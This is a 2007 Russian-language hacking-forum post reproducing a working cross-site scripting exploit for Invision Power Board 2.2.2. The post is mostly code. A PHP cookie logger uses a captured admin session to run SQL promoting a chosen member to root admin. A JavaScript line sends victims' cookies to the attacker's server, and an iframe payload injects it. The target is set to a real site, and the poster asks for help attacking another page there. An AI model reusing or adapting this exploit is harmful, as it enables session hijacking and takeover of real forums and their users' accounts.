ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Ipb 2.2.2
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Ipb 2.2.2
  #1  
Старый 24.08.2007, 21:42
Аватар для ch[@]ch
ch[@]ch
Banned
Регистрация: 21.06.2007
Сообщений: 87
Провел на форуме:
543344

Репутация: 43
По умолчанию Ipb 2.2.2
PHP код:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

#   Invision Power Board 2.2.2 Cross Site Scripting vulnerability 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#   Vendor site: http://www.invisionboard.com/ 
#   Vulnerability found by Iron (ironwarez.info) 

#   Greets to all **** Security Group members     

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#   The vulnerability: 
#   Open up any php file in /jscripts/folder_rte_files 
#    See: 

    var editor_id         = <?php print '"'.trim($_REQUEST['editorid']).'";'?> 
     

#   $_REQUEST['editorid'] isn't sanitized in any way, so allows 
#   other uses to execute their own code. 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#   PoC (Log cookies & run SQL query) 

#   Requirements: server supporting PHP, user account on 
#   target forum, database prefix needs to be known. 

#   Create a file called name.php on your webserver and put this code in it: 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<?php 
$target "http://www.l2.rednet.su/forum"#Target forum without trailing slash 
$prefix "ibf_"#Database prefix, default: ibf_ 
$member 22#Member id to promote 
$newgroup 4# The id of the new group to promote, normally 4 is root admin 

$ip $_SERVER['REMOTE_ADDR']; 
$referer $_SERVER['HTTP_REFERER']; 
$agent $_SERVER['HTTP_USER_AGENT']; 

$data $_GET['c']; 
$time date("Y-m-d G:i:s A"); 
$text "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n"

$file fopen('log.txt' 'a'); 
fwrite($file,$text); 
fclose($file); 
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff)) 

print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql&section=admin&query=UPDATE+ 
'.$prefix.'members+SET 
+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.  $member.'%27&st="></>'

?> 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#    Also create a file in the same directory named "log.txt" and chmod it 777 

#    Now, create a file called script.js on your webserver, put this code in it: 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie; 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

#    And, last but not least, create a file that combines those two;) 
#    Name it blah.html and put this code in it: 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<iframe border=0 src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></ 
script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>
нашел скрипт на ачате....спс автору...но есть вопрос....запустить я научился....но вот пользоваться нет,никак не могу понять что куда вписать....нужен такой же скрипт для сайта http://l2.rednet.su/news.php ....пожалуйста,помогите!!
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
скрипт распознавания форума genom-- Форумы 22 31.12.2008 15:06
Бэкдор в Ipb 2.2.2 (Русская пиратская версия) Shram-spb Форумы 9 16.07.2007 18:07
IPB 2.2.2 Nulled »Atom1c« PHP, PERL, MySQL, JavaScript 14 11.04.2007 10:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ